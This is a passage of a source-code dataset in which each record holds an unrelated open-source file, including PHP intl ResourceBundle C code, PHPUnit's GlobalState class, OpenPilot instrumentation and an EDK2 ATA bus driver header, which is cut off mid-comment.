{\n\t\tintl_errors_set(INTL_DATA_ERROR_P(rb), U_ILLEGAL_ARGUMENT_ERROR,\n\t\t\t\"resourcebundle_get: index should be integer or string\", 0);\n\t\tRETURN_NULL();\n\t}\n\n\tintl_error_set_code( NULL, INTL_DATA_ERROR_CODE(rb) );\n\tif (U_FAILURE(INTL_DATA_ERROR_CODE(rb))) {\n\t\tif (is_numeric) {\n\t\t\tspprintf( &pbuf, 0, \"Cannot load resource element %d\", meindex );\n\t\t} else {\n\t\t\tspprintf( &pbuf, 0, \"Cannot load resource element '%s'\", mekey );\n\t\t}\n\t\tintl_errors_set_custom_msg( INTL_DATA_ERROR_P(rb), pbuf, 1 );\n\t\tefree(pbuf);\n\t\tRETURN_NULL();\n\t}\n\n\tif (!fallback && (INTL_DATA_ERROR_CODE(rb) == U_USING_FALLBACK_WARNING || INTL_DATA_ERROR_CODE(rb) == U_USING_DEFAULT_WARNING)) {\n\t\tUErrorCode icuerror;\n\t\tconst char * locale = ures_getLocaleByType( rb->me, ULOC_ACTUAL_LOCALE, &icuerror );\n\t\tif (is_numeric) {\n\t\t\tspprintf( &pbuf, 0, \"Cannot load element %d without fallback from to %s\", meindex, locale );\n\t\t} else {\n\t\t\tspprintf( &pbuf, 0, \"Cannot load element '%s' without fallback from to %s\", mekey, locale );\n\t\t}\n\t\tintl_errors_set_custom_msg( INTL_DATA_ERROR_P(rb), pbuf, 1 );\n\t\tefree(pbuf);\n\t\tRETURN_NULL();\n\t}\n\n\tresourcebundle_extract_value( return_value, rb );\n}\n/* }}} */\n\n/* {{{ resourcebundle_array_get */\nzval *resourcebundle_array_get(zend_object *object, zval *offset, int type, zval *rv)\n{\n\tif(offset == NULL) {\n\t\tphp_error( E_ERROR, \"Cannot apply [] to ResourceBundle object\" );\n\t}\n\tZVAL_NULL(rv);\n\tresourcebundle_array_fetch(object, offset, rv, 1);\n\treturn rv;\n}\n/* }}} */\n\n/* {{{ Get resource identified by numerical index or key name. */\nPHP_FUNCTION( resourcebundle_get )\n{\n\tzend_bool fallback = 1;\n\tzval *\t\toffset;\n\tzval * object;\n\n\tif (zend_parse_method_parameters(ZEND_NUM_ARGS(), getThis(), \"Oz|b\",\t&object, ResourceBundle_ce_ptr, &offset, &fallback ) == FAILURE) {\n\t\tRETURN_THROWS();\n\t}\n\n\tresourcebundle_array_fetch(Z_OBJ_P(object), offset, return_value, fallback);\n}\n/* }}} */\n\n/* {{{ resourcebundle_array_count */\nint resourcebundle_array_count(zend_object *object, zend_long *count)\n{\n\tResourceBundle_object *rb = php_intl_resourcebundle_fetch_object(object);\n\n\tif (rb->me == NULL) {\n\t\tintl_errors_set(&rb->error, U_ILLEGAL_ARGUMENT_ERROR,\n\t\t\t\t\"Found unconstructed ResourceBundle\", 0);\n\t\treturn 0;\n\t}\n\n\t*count = ures_getSize( rb->me );\n\n\treturn SUCCESS;\n}\n/* }}} */\n\n/* {{{ Get resources count */\nPHP_FUNCTION( resourcebundle_count )\n{\n\tint32_t len;\n\tRESOURCEBUNDLE_METHOD_INIT_VARS;\n\n\tif( zend_parse_method_parameters( ZEND_NUM_ARGS(), getThis(), \"O\", &object, ResourceBundle_ce_ptr ) == FAILURE ) {\n\t\tRETURN_THROWS();\n\t}\n\n\tRESOURCEBUNDLE_METHOD_FETCH_OBJECT;\n\n\tlen = ures_getSize( rb->me );\n\tRETURN_LONG( len );\n}\n\n/* {{{ Get available locales from ResourceBundle name */\nPHP_FUNCTION( resourcebundle_locales )\n{\n\tchar * bundlename;\n\tsize_t bundlename_len = 0;\n\tconst char * entry;\n\tint entry_len;\n\tUEnumeration *icuenum;\n\tUErrorCode icuerror = U_ZERO_ERROR;\n\n\tintl_errors_reset( NULL );\n\n\tif( zend_parse_parameters(ZEND_NUM_ARGS(), \"s\", &bundlename, &bundlename_len ) == FAILURE )\n\t{\n\t\tRETURN_THROWS();\n\t}\n\n\tif (bundlename_len >= MAXPATHLEN) {\n\t\tzend_argument_value_error(1, \"is too long\");\n\t\tRETURN_THROWS();\n\t}\n\n\tif(bundlename_len == 0) {\n\t\t// fetch default locales list\n\t\tbundlename = NULL;\n\t}\n\n\ticuenum = ures_openAvailableLocales( bundlename, &icuerror );\n\tINTL_CHECK_STATUS(icuerror, \"Cannot fetch locales list\");\n\n\tuenum_reset( icuenum, &icuerror );\n\tINTL_CHECK_STATUS(icuerror, \"Cannot iterate locales list\");\n\n\tarray_init( return_value );\n\twhile ((entry = uenum_next( icuenum, &entry_len, &icuerror ))) {\n\t\tadd_next_index_stringl( return_value, (char *) entry, entry_len);\n\t}\n\tuenum_close( icuenum );\n}\n/* }}} */\n\n/* {{{ Get text description for ResourceBundle's last error code. */\nPHP_FUNCTION( resourcebundle_get_error_code )\n{\n\tRESOURCEBUNDLE_METHOD_INIT_VARS;\n\n\tif( zend_parse_method_parameters( ZEND_NUM_ARGS(), getThis(), \"O\",\n\t\t&object, ResourceBundle_ce_ptr ) == FAILURE )\n\t{\n\t\tRETURN_THROWS();\n\t}\n\n\trb = Z_INTL_RESOURCEBUNDLE_P( object );\n\n\tRETURN_LONG(INTL_DATA_ERROR_CODE(rb));\n}\n/* }}} */\n\n/* {{{ Get text description for ResourceBundle's last error. */\nPHP_FUNCTION( resourcebundle_get_error_message )\n{\n\tzend_string* message = NULL;\n\tRESOURCEBUNDLE_METHOD_INIT_VARS;\n\n\tif( zend_parse_method_parameters( ZEND_NUM_ARGS(), getThis(), \"O\",\n\t\t&object, ResourceBundle_ce_ptr ) == FAILURE )\n\t{\n\t\tRETURN_THROWS();\n\t}\n\n\trb = Z_INTL_RESOURCEBUNDLE_P( object );\n\tmessage = intl_error_get_message(INTL_DATA_ERROR_P(rb));\n\tRETURN_STR(message);\n}\n/* }}} */\n\nPHP_METHOD(ResourceBundle, getIterator) {\n\tif (zend_parse_parameters_none() == FAILURE) {\n\t\treturn;\n\t}\n\n\tzend_create_internal_iterator_zval(return_value, ZEND_THIS);\n}\n\n/* {{{ resourcebundle_register_class\n * Initialize 'ResourceBundle' class\n */\nvoid resourcebundle_register_class( void )\n{\n\tzend_class_entry ce;\n\n\tINIT_CLASS_ENTRY( ce, \"ResourceBundle\", class_ResourceBundle_methods );\n\n\tce.create_object = ResourceBundle_object_create;\n\tce.get_iterator = resourcebundle_get_iterator;\n\n\tResourceBundle_ce_ptr = zend_register_internal_class( &ce );\n\n\tResourceBundle_object_handlers = std_object_handlers;\n\tResourceBundle_object_handlers.offset = XtOffsetOf(ResourceBundle_object, zend);\n\tResourceBundle_object_handlers.clone_obj\t = NULL; /* ICU ResourceBundle has no clone implementation */\n\tResourceBundle_object_handlers.free_obj = ResourceBundle_object_free;\n\tResourceBundle_object_handlers.read_dimension = resourcebundle_array_get;\n\tResourceBundle_object_handlers.count_elements = resourcebundle_array_count;\n\n\tzend_class_implements(ResourceBundle_ce_ptr, 2, zend_ce_aggregate, zend_ce_countable);\n}\n/* }}} */\n"} {"text": "#include \r\n\r\n#include \r\n#include \r\n\r\n#include \"../common.hpp\"\r\n#include \"../../duktape.h\"\r\n\r\nusing namespace hadouken::scripting::modules;\r\nusing namespace hadouken::scripting::modules::bittorrent;\r\n\r\nvoid feed_handle_wrapper::initialize(duk_context* ctx, const libtorrent::feed_handle& handle)\r\n{\r\n static duk_function_list_entry functions[] =\r\n {\r\n { \"updateFeed\", update_feed, 0 },\r\n { \"getStatus\", get_feed_status, 0 },\r\n { \"getSettings\", get_settings, 0 },\r\n { \"setSettings\", set_settings, 1 },\r\n { NULL, NULL, 0 }\r\n };\r\n\r\n duk_idx_t idx = duk_push_object(ctx);\r\n duk_put_function_list(ctx, idx, functions);\r\n\r\n common::set_pointer(ctx, idx, new libtorrent::feed_handle(handle));\r\n\r\n duk_push_c_function(ctx, finalize, 1);\r\n duk_set_finalizer(ctx, -2);\r\n}\r\n\r\nduk_ret_t feed_handle_wrapper::finalize(duk_context* ctx)\r\n{\r\n common::finalize(ctx);\r\n return 0;\r\n}\r\n\r\nduk_ret_t feed_handle_wrapper::update_feed(duk_context* ctx)\r\n{\r\n return 0;\r\n}\r\n\r\nduk_ret_t feed_handle_wrapper::get_feed_status(duk_context* ctx)\r\n{\r\n libtorrent::feed_handle* handle = common::get_pointer(ctx);\r\n feed_status_wrapper::initialize(ctx, handle->get_feed_status());\r\n return 1;\r\n}\r\n\r\nduk_ret_t feed_handle_wrapper::get_settings(duk_context* ctx)\r\n{\r\n return 0;\r\n}\r\n\r\nduk_ret_t feed_handle_wrapper::set_settings(duk_context* ctx)\r\n{\r\n return 0;\r\n}\r\n"} {"text": "{\n \"images\" : [\n {\n \"idiom\" : \"universal\",\n \"scale\" : \"1x\"\n },\n {\n \"idiom\" : \"universal\",\n \"filename\" : \"dislike_details_20x20_@2x.png\",\n \"scale\" : \"2x\"\n },\n {\n \"idiom\" : \"universal\",\n \"filename\" : \"dislike_details_20x20_@3x.png\",\n \"scale\" : \"3x\"\n }\n ],\n \"info\" : {\n \"version\" : 1,\n \"author\" : \"xcode\"\n }\n}"} {"text": "load(\"@prysm//tools/go:def.bzl\", \"go_library\")\n\ngo_library(\n name = \"go_default_library\",\n srcs = [\n \"protector_mock.go\",\n \"slasher_mock.go\",\n ],\n importpath = \"github.com/prysmaticlabs/prysm/validator/testing\",\n visibility = [\"//validator:__subpackages__\"],\n deps = [\n \"//proto/slashing:go_default_library\",\n \"@com_github_golang_protobuf//proto:go_default_library\",\n \"@com_github_prysmaticlabs_ethereumapis//eth/v1alpha1:go_default_library\",\n \"@org_golang_google_grpc//:go_default_library\",\n ],\n)\n"} {"text": "/*\n * Copyright (C) 2007 The Android Open Source Project\n *\n * Licensed under the Apache License, Version 2.0 (the \"License\");\n * you may not use this file except in compliance with the License.\n * You may obtain a copy of the License at\n *\n * http://www.apache.org/licenses/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n */\n\npackage android.sax;\n\n/**\n * Listens for the end of elements.\n */\npublic interface EndElementListener {\n\n /**\n * Invoked at the end of an element.\n */\n void end();\n}\n"} {"text": "\n\n\t\n\t\t\n\t\n\t\n\t \n\t\t\n\t\t\n\t\t\n\t\n'#DFFFE0',\n\tCLogger::LEVEL_INFO=>'#FFFFDF',\n\tCLogger::LEVEL_WARNING=>'#FFDFE5',\n\tCLogger::LEVEL_ERROR=>'#FFC0CB',\n);\nforeach($data as $index=>$log)\n{\n\t$color=($index%2)?'#F5F5F5':'#FFFFFF';\n\tif(isset($colors[$log[1]]))\n\t\t$color=$colors[$log[1]];\n\t$message='
'.CHtml::encode(wordwrap($log[0])).'
';\n\t$time=date('H:i:s.',$log[3]).(int)(($log[3]-(int)$log[3])*1000000);\n\n\techo <<\n\t\t\n\t\t\n\t\t\n\t\t\n\t\nEOD;\n}\n?>\n
\n\t\t\tApplication Log\n\t\t
TimestampLevelCategoryMessage
{$time}{$log[1]}{$log[2]}{$message}
\n"} {"text": "\n */\ninterface Swift_Signers_HeaderSigner extends Swift_Signer, Swift_InputByteStream\n{\n /**\n * Exclude an header from the signed headers\n *\n * @param string $header_name\n *\n * @return Swift_Signers_HeaderSigner\n */\n public function ignoreHeader($header_name);\n\n /**\n * Prepare the Signer to get a new Body\n *\n * @return Swift_Signers_HeaderSigner\n */\n public function startBody();\n\n /**\n * Give the signal that the body has finished streaming\n *\n * @return Swift_Signers_HeaderSigner\n */\n public function endBody();\n\n /**\n * Give the headers already given\n *\n * @param Swift_Mime_SimpleHeaderSet $headers\n *\n * @return Swift_Signers_HeaderSigner\n */\n public function setHeaders(Swift_Mime_HeaderSet $headers);\n\n /**\n * Add the header(s) to the headerSet\n *\n * @param Swift_Mime_HeaderSet $headers\n *\n * @return Swift_Signers_HeaderSigner\n */\n public function addSignature(Swift_Mime_HeaderSet $headers);\n\n /**\n * Return the list of header a signer might tamper\n *\n * @return array\n */\n public function getAlteredHeaders();\n}\n"} {"text": "# Sales Sequence Functional Tests\n\nThe Functional Test Module for **Magento Sales Sequence** module.\n"} {"text": "/**\n ******************************************************************************\n *\n * @file instrumentation.c\n * @author The OpenPilot Team, http://www.openpilot.org Copyright (C) 2014.\n * @brief Instrumentation infrastructure\n * UAVObject wrapper layer for PiOS instrumentation\n * @see The GNU Public License (GPL) Version 3\n *\n *****************************************************************************/\n/*\n * This program is free software; you can redistribute it and/or modify\n * it under the terms of the GNU General Public License as published by\n * the Free Software Foundation; either version 3 of the License, or\n * (at your option) any later version.\n *\n * This program is distributed in the hope that it will be useful, but\n * WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY\n * or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License\n * for more details.\n *\n * You should have received a copy of the GNU General Public License along\n * with this program; if not, write to the Free Software Foundation, Inc.,\n * 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\n */\n\n#include \n#include \n#include \n\nstatic uint8_t publishedCountersInstances = 0;\nstatic void counterCallback(const pios_perf_counter_t *counter, const int8_t index, void *context);\nstatic xSemaphoreHandle sem;\nvoid InstrumentationInit()\n{\n PerfCounterInitialize();\n publishedCountersInstances = 1;\n vSemaphoreCreateBinary(sem);\n}\n\nvoid InstrumentationPublishAllCounters()\n{\n if (xSemaphoreTake(sem, 0) != pdTRUE) {\n return;\n }\n PIOS_Instrumentation_ForEachCounter(&counterCallback, NULL);\n xSemaphoreGive(sem);\n}\n\nvoid counterCallback(const pios_perf_counter_t *counter, const int8_t index, __attribute__((unused)) void *context)\n{\n if (publishedCountersInstances < index + 1) {\n PerfCounterCreateInstance();\n publishedCountersInstances++;\n }\n PerfCounterData data;\n data.Id = counter->id;\n data.Counter.Max = counter->max;\n data.Counter.Min = counter->min;\n data.Counter.Value = counter->value;\n PerfCounterInstSet(index, &data);\n}\n"} {"text": "\n *\n * For the full copyright and license information, please view the LICENSE\n * file that was distributed with this source code.\n */\nnamespace PHPUnit\\Util;\n\nuse function array_keys;\nuse function array_reverse;\nuse function defined;\nuse function get_defined_constants;\nuse function get_included_files;\nuse function in_array;\nuse function ini_get_all;\nuse function is_array;\nuse function is_file;\nuse function is_scalar;\nuse function preg_match;\nuse function serialize;\nuse function sprintf;\nuse function strpos;\nuse function var_export;\nuse Closure;\n\n/**\n * @internal This class is not covered by the backward compatibility promise for PHPUnit\n */\nfinal class GlobalState\n{\n /**\n * @var string[]\n */\n private const SUPER_GLOBAL_ARRAYS = [\n '_ENV',\n '_POST',\n '_GET',\n '_COOKIE',\n '_SERVER',\n '_FILES',\n '_REQUEST',\n ];\n\n /**\n * @throws Exception\n */\n public static function getIncludedFilesAsString(): string\n {\n return self::processIncludedFilesAsString(get_included_files());\n }\n\n /**\n * @param string[] $files\n *\n * @throws Exception\n */\n public static function processIncludedFilesAsString(array $files): string\n {\n $excludeList = new ExcludeList;\n $prefix = false;\n $result = '';\n\n if (defined('__PHPUNIT_PHAR__')) {\n $prefix = 'phar://' . __PHPUNIT_PHAR__ . '/';\n }\n\n // Do not process bootstrap script\n unset($files[0]);\n\n foreach (array_reverse($files) as $file) {\n if (!empty($GLOBALS['__PHPUNIT_ISOLATION_EXCLUDE_LIST']) &&\n in_array($file, $GLOBALS['__PHPUNIT_ISOLATION_EXCLUDE_LIST'], true)) {\n continue;\n }\n\n if ($prefix !== false && strpos($file, $prefix) === 0) {\n continue;\n }\n\n // Skip virtual file system protocols\n if (preg_match('/^(vfs|phpvfs[a-z0-9]+):/', $file)) {\n continue;\n }\n\n if (!$excludeList->isExcluded($file) && is_file($file)) {\n $result = 'require_once \\'' . $file . \"';\\n\" . $result;\n }\n }\n\n return $result;\n }\n\n public static function getIniSettingsAsString(): string\n {\n $result = '';\n\n foreach (ini_get_all(null, false) as $key => $value) {\n $result .= sprintf(\n '@ini_set(%s, %s);' . \"\\n\",\n self::exportVariable($key),\n self::exportVariable((string) $value)\n );\n }\n\n return $result;\n }\n\n public static function getConstantsAsString(): string\n {\n $constants = get_defined_constants(true);\n $result = '';\n\n if (isset($constants['user'])) {\n foreach ($constants['user'] as $name => $value) {\n $result .= sprintf(\n 'if (!defined(\\'%s\\')) define(\\'%s\\', %s);' . \"\\n\",\n $name,\n $name,\n self::exportVariable($value)\n );\n }\n }\n\n return $result;\n }\n\n public static function getGlobalsAsString(): string\n {\n $result = '';\n\n foreach (self::SUPER_GLOBAL_ARRAYS as $superGlobalArray) {\n if (isset($GLOBALS[$superGlobalArray]) && is_array($GLOBALS[$superGlobalArray])) {\n foreach (array_keys($GLOBALS[$superGlobalArray]) as $key) {\n if ($GLOBALS[$superGlobalArray][$key] instanceof Closure) {\n continue;\n }\n\n $result .= sprintf(\n '$GLOBALS[\\'%s\\'][\\'%s\\'] = %s;' . \"\\n\",\n $superGlobalArray,\n $key,\n self::exportVariable($GLOBALS[$superGlobalArray][$key])\n );\n }\n }\n }\n\n $excludeList = self::SUPER_GLOBAL_ARRAYS;\n $excludeList[] = 'GLOBALS';\n\n foreach (array_keys($GLOBALS) as $key) {\n if (!$GLOBALS[$key] instanceof Closure && !in_array($key, $excludeList, true)) {\n $result .= sprintf(\n '$GLOBALS[\\'%s\\'] = %s;' . \"\\n\",\n $key,\n self::exportVariable($GLOBALS[$key])\n );\n }\n }\n\n return $result;\n }\n\n private static function exportVariable($variable): string\n {\n if (is_scalar($variable) || $variable === null ||\n (is_array($variable) && self::arrayOnlyContainsScalars($variable))) {\n return var_export($variable, true);\n }\n\n return 'unserialize(' . var_export(serialize($variable), true) . ')';\n }\n\n private static function arrayOnlyContainsScalars(array $array): bool\n {\n $result = true;\n\n foreach ($array as $element) {\n if (is_array($element)) {\n $result = self::arrayOnlyContainsScalars($element);\n } elseif (!is_scalar($element) && $element !== null) {\n $result = false;\n }\n\n if (!$result) {\n break;\n }\n }\n\n return $result;\n }\n}\n"} {"text": "/** @file\r\n Master header file for ATA Bus Driver.\r\n\r\n This file defines common data structures, macro definitions and some module\r\n internal function header files.\r\n\r\n Copyright (c) 2009 - 2015, Intel Corporation. All rights reserved.
\r\n SPDX-License-Identifier: BSD-2-Clause-Patent\r\n\r\n**/\r\n\r\n#ifndef _ATA_BUS_H_\r\n#define _ATA_BUS_H_\r\n\r\n#include \r\n\r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n\r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n\r\n#include \r\n\r\n//\r\n// Time out value for ATA pass through protocol\r\n//\r\n#define ATA_TIMEOUT EFI_TIMER_PERIOD_SECONDS (3)\r\n\r\n//\r\n// Maximum number of times to retry ATA command\r\n//\r\n#define MAX_RETRY_TIMES 3\r\n\r\n//\r\n// The maximum total sectors count in 28 bit addressing mode\r\n//\r\n#define MAX_28BIT_ADDRESSING_CAPACITY 0xfffffff\r\n\r\n//\r\n// The maximum ATA transaction sector count in 28 bit addressing mode.\r\n//\r\n#define MAX_28BIT_TRANSFER_BLOCK_NUM 0x100\r\n\r\n//\r\n// The maximum ATA transaction sector count in 48 bit addressing mode.\r\n//\r\n//#define MAX_48BIT_TRANSFER_BLOCK_NUM 0x10000\r\n\r\n//\r\n// BugBug: if the TransferLength is equal with 0x10000 (the 48bit max length),\r\n// there is a bug that even the register interrupt bit has been sit, the buffer\r\n// seems not ready. Change the Maximum Sector Numbers to 0xFFFF to work round\r\n// this issue.\r\n//\r\n#define MAX_48BIT_TRANSFER_BLOCK_NUM 0xFFFF\r\n\r\n//\r\n// The maximum model name in ATA identify data\r\n//\r\n#define MAX_MODEL_NAME_LEN 40\r\n\r\n#define ATA_TASK_SIGNATURE SIGNATURE_32 ('A', 'T', 'S', 'K')\r\n#define ATA_DEVICE_SIGNATURE SIGNATURE_32 ('A', 'B', 'I', 'D')\r\n#define ATA_SUB_TASK_SIGNATURE SIGNATURE_32 ('A', 'S', 'T', 'S')\r\n#define IS_ALIGNED(addr, size) (((UINTN) (addr) & (size - 1)) == 0)\r\n\r\n//\r\n// ATA bus data structure for ATA controller\r\n//\r\ntypedef struct {\r\n EFI_ATA_PASS_THRU_PROTOCOL *AtaPassThru;\r\n EFI_HANDLE Controller;\r\n EFI_DEVICE_PATH_PROTOCOL *ParentDevicePath;\r\n EFI_HANDLE DriverBindingHandle;\r\n} ATA_BUS_DRIVER_DATA;\r\n\r\n//\r\n// ATA device data structure for each child device\r\n//\r\ntypedef struct {\r\n UINT32 Signature;\r\n\r\n EFI_HANDLE Handle;\r\n EFI_BLOCK_IO_PROTOCOL BlockIo;\r\n EFI_BLOCK_IO2_PROTOCOL BlockIo2;\r\n EFI_BLOCK_IO_MEDIA BlockMedia;\r\n EFI_DISK_INFO_PROTOCOL DiskInfo;\r\n EFI_DEVICE_PATH_PROTOCOL *DevicePath;\r\n EFI_STORAGE_SECURITY_COMMAND_PROTOCOL StorageSecurity;\r\n\r\n ATA_BUS_DRIVER_DATA *AtaBusDriverData;\r\n UINT16 Port;\r\n UINT16 PortMultiplierPort;\r\n\r\n //\r\n // Buffer for the execution of ATA pass through protocol\r\n //\r\n EFI_ATA_PASS_THRU_COMMAND_PACKET Packet;\r\n EFI_ATA_COMMAND_BLOCK Acb;\r\n EFI_ATA_STATUS_BLOCK *Asb;\r\n\r\n BOOLEAN UdmaValid;\r\n BOOLEAN Lba48Bit;\r\n\r\n //\r\n // Cached data for ATA identify data\r\n //\r\n ATA_IDENTIFY_DATA *IdentifyData;\r\n\r\n EFI_UNICODE_STRING_TABLE *ControllerNameTable;\r\n CHAR16 ModelName[MAX_MODEL_NAME_LEN + 1];\r\n\r\n LIST_ENTRY AtaTaskList;\r\n LIST_ENTRY AtaSubTaskList;\r\n BOOLEAN Abort;\r\n} ATA_DEVICE;\r\n\r\n//\r\n// Sub-Task for the non blocking I/O\r\n//\r\ntypedef struct {\r\n UINT32 Signature;\r\n ATA_DEVICE *AtaDevice;\r\n EFI_BLOCK_IO2_TOKEN *Token;\r\n UINTN *UnsignalledEventCount;\r\n EFI_ATA_PASS_THRU_COMMAND_PACKET Packet;\r\n BOOLEAN *IsError;// Indicate whether meeting error during source allocation for new task.\r\n LIST_ENTRY TaskEntry;\r\n} ATA_BUS_ASYN_SUB_TASK;\r\n\r\n//\r\n// Task for the non blocking I/O\r\n//\r\ntypedef struct {\r\n UINT32 Signature;\r\n EFI_BLOCK_IO2_TOKEN *Token;\r\n ATA_DEVICE *AtaDevice;\r\n UINT8 *Buffer;\r\n EFI_LBA StartLba;\r\n UINTN NumberOfBlocks;\r\n BOOLEAN IsWrite;\r\n LIST_ENTRY TaskEntry;\r\n} ATA_BUS_ASYN_TASK;\r\n\r\n#define ATA_DEVICE_FROM_BLOCK_IO(a) CR (a, ATA_DEVICE, BlockIo, ATA_DEVICE_SIGNATURE)\r\n#define ATA_DEVICE_FROM_BLOCK_IO2(a) CR (a, ATA_DEVICE, BlockIo2, ATA_DEVICE_SIGNATURE)\r\n#define ATA_DEVICE_FROM_DISK_INFO(a) CR (a, ATA_DEVICE, DiskInfo, ATA_DEVICE_SIGNATURE)\r\n#define ATA_DEVICE_FROM_STORAGE_SECURITY(a) CR (a, ATA_DEVICE, StorageSecurity, ATA_DEVICE_SIGNATURE)\r\n#define ATA_ASYN_SUB_TASK_FROM_ENTRY(a) CR (a, ATA_BUS_ASYN_SUB_TASK, TaskEntry, ATA_SUB_TASK_SIGNATURE)\r\n#define ATA_ASYN_TASK_FROM_ENTRY(a) CR (a, ATA_BUS_ASYN_TASK, TaskEntry, ATA_TASK_SIGNATURE)\r\n\r\n//\r\n// Global Variables\r\n//\r\nextern EFI_DRIVER_BINDING_PROTOCOL gAtaBusDriverBinding;\r\nextern EFI_COMPONENT_NAME_PROTOCOL gAtaBusComponentName;\r\nextern EFI_COMPONENT_NAME2_PROTOCOL gAtaBusComponentName2;\r\n\r\n/**\r\n Allocates an aligned buffer for ATA device.\r\n\r\n This function allocates an aligned buffer for the ATA device to perform\r\n ATA pass through operations. The alignment requirement is from ATA pass\r\n through interface.\r\n\r\n @param AtaDevice The ATA child device involved for the operation.\r\n @param BufferSize The request buffer size.\r\n\r\n @return A pointer to the aligned buffer or NULL if the allocation fails.\r\n\r\n**/\r\nVOID *\r\nAllocateAlignedBuffer (\r\n IN ATA_DEVICE *AtaDevice,\r\n IN UINTN BufferSize\r\n );\r\n\r\n/**\r\n Frees an aligned buffer for ATA device.\r\n\r\n This function frees an aligned buffer for the ATA device to perform\r\n ATA pass through operations.\r\n\r\n @param Buffer The aligned buffer to be freed.\r\n @param BufferSize The request buffer size.\r\n\r\n**/\r\nVOID\r\nFreeAlignedBuffer (\r\n IN VOID *Buffer,\r\n IN UINTN BufferSize\r\n );\r\n\r\n/**\r\n Free SubTask.\r\n\r\n @param[in, out] Task Pointer to task to be freed.\r\n\r\n**/\r\nVOID\r\nEFIAPI\r\nFreeAtaSubTask (\r\n IN OUT ATA_BUS_ASYN_SUB_TASK *Task\r\n );\r\n\r\n/**\r\n Wrapper for EFI_ATA_PASS_THRU_PROTOCOL.ResetDevice().\r\n\r\n This function wraps the ResetDevice() invocation for ATA pass through function\r\n for an ATA device.\r\n\r\n @param AtaDevice The ATA child device involved for the operation.\r\n\r\n @return The return status from EFI_ATA_PASS_THRU_PROTOCOL.PassThru().\r\n\r\n**/\r\nEFI_STATUS\r\nResetAtaDevice (\r\n IN ATA_DEVICE *AtaDevice\r\n );\r\n\r\n\r\n/**\r\n Discovers whether it is a valid ATA device.\r\n\r\n This function issues ATA_CMD_IDENTIFY_DRIVE command to the ATA device to identify it.\r\n If the command is executed successfully, it then identifies it and initializes\r\n the Media information in Block IO protocol interface.\r\n\r\n @param AtaDevice The ATA child device involved for the operation.\r\n\r\n @retval EFI_SUCCESS The device is successfully identified and Media information\r\n is correctly initialized.\r\n @return others Some error occurs when discovering the ATA device.\r\n\r\n**/\r\nEFI_STATUS\r\nDiscoverAtaDevice (\r\n IN OUT ATA_DEVICE *AtaDevice\r\n );\r\n\r\n/**\r\n Read or write a number of blocks from ATA device.\r\n\r\n This function performs ATA pass through transactions to read/write data from/to\r\n ATA device. It may separate the read/write request into several ATA pass through\r\n transactions.\r\n\r\n @param[in, out] AtaDevice The ATA child device involved for the operation.\r\n @param[in, out] Buffer The pointer to the current transaction buffer.\r\n @param[in] StartLba The starting logical block address to be accessed.\r\n @param[in] NumberOfBlocks The block number or sector count of the transfer.\r\n @param[in] IsWrite Indicates whether it is a write operation.\r\n @param[in, out] Token A pointer to the token associated with the transaction.\r\n\r\n @retval EFI_SUCCESS The data transfer is complete successfully.\r\n @return others Some error occurs when transferring data.\r\n\r\n**/\r\nEFI_STATUS\r\nAccessAtaDevice(\r\n IN OUT ATA_DEVICE *AtaDevice,\r\n IN OUT UINT8 *Buffer,\r\n IN EFI_LBA StartLba,\r\n IN UINTN NumberOfBlocks,\r\n IN BOOLEAN IsWrite,\r\n IN OUT EFI_BLOCK_IO2_TOKEN *Token\r\n );\r\n\r\n/**\r\n Trust transfer data from/to ATA device.\r\n\r\n This function performs one ATA pass through transaction to do a trust transfer from/to\r\n ATA device. It chooses the appropriate ATA command and protocol to invoke PassThru\r\n interface of ATA pass through.\r\n\r\n @param AtaDevice The ATA child device involved for the operation.\r\n @param Buffer The pointer to the current transaction buffer.\r\n @param SecurityProtocolId The value of the \"Security Protocol\" parameter of\r\n the security protocol command to be sent.\r\n @param SecurityProtocolSpecificData The value of the \"Security Protocol Specific\" parameter\r\n of the security protocol command to be sent.\r\n @param TransferLength The block number or sector count of the transfer.\r\n @param IsTrustSend Indicates whether it is a trust send operation or not.\r\n @param Timeout The timeout, in 100ns units, to use for the execution\r\n of the security protocol command. A Timeout value of 0\r\n means that this function will wait indefinitely for the\r\n security protocol command to execute. If Timeout is greater\r\n than zero, then this function will return EFI_TIMEOUT\r\n if the time required to execute the receive data command\r\n is greater than Timeout.\r\n @param TransferLengthOut A pointer to a buffer to store the size in bytes of the data\r\n written to the buffer. Ignore it when IsTrustSend is TRUE.\r\n\r\n @retval EFI_SUCCESS The data transfer is complete successfully.\r\n @return others Some error occurs when transferring data.\r\n\r\n**/\r\nEFI_STATUS\r\nEFIAPI\r\nTrustTransferAtaDevice (\r\n IN OUT ATA_DEVICE *AtaDevice,\r\n IN OUT VOID *Buffer,\r\n IN UINT8 SecurityProtocolId,\r\n IN UINT16 SecurityProtocolSpecificData,\r\n IN UINTN TransferLength,\r\n IN BOOLEAN IsTrustSend,\r\n IN UINT64 Timeout,\r\n OUT UINTN *TransferLengthOut\r\n );\r\n\r\n//\r\n// Protocol interface prototypes\r\n//\r\n/**\r\n Tests to see if this driver supports a given controller. If a child device is provided,\r\n it further tests to see if this driver supports creating a handle for the specified child device.\r\n\r\n This function checks to see if the driver specified by This supports the device specified by\r\n ControllerHandle. Drivers will typically use the device path attached to\r\n ControllerHandle and/or the services from the bus I/O abstraction attached to\r\n ControllerHandle to determine if the driver supports ControllerHandle. This function\r\n may be called many times during platform initialization. In order to reduce boot times, the tests\r\n performed by this function must be very small, and take as little time as possible to execute. This\r\n function must not change the state of any hardware devices, and this function must be aware that the\r\n device specified by ControllerHandle may already be managed by the same driver or a\r\n different driver. This function must match its calls to AllocatePages() with FreePages(),\r\n AllocatePool() with FreePool(), and OpenProtocol() with CloseProtocol().\r\n Since ControllerHandle may have been previously started by the same driver, if a protocol is\r\n already in the opened state, then it must not be closed with CloseProtocol(). This is required\r\n to guarantee the state of ControllerHandle is not modified by this function.\r\n\r\n @param[in] This A pointer to the EFI_DRIVER_BINDING_PROTOCOL instance.\r\n @param[in] ControllerHandle The handle of the controller to test. This handle\r\n must support a protocol interface that supplies\r\n 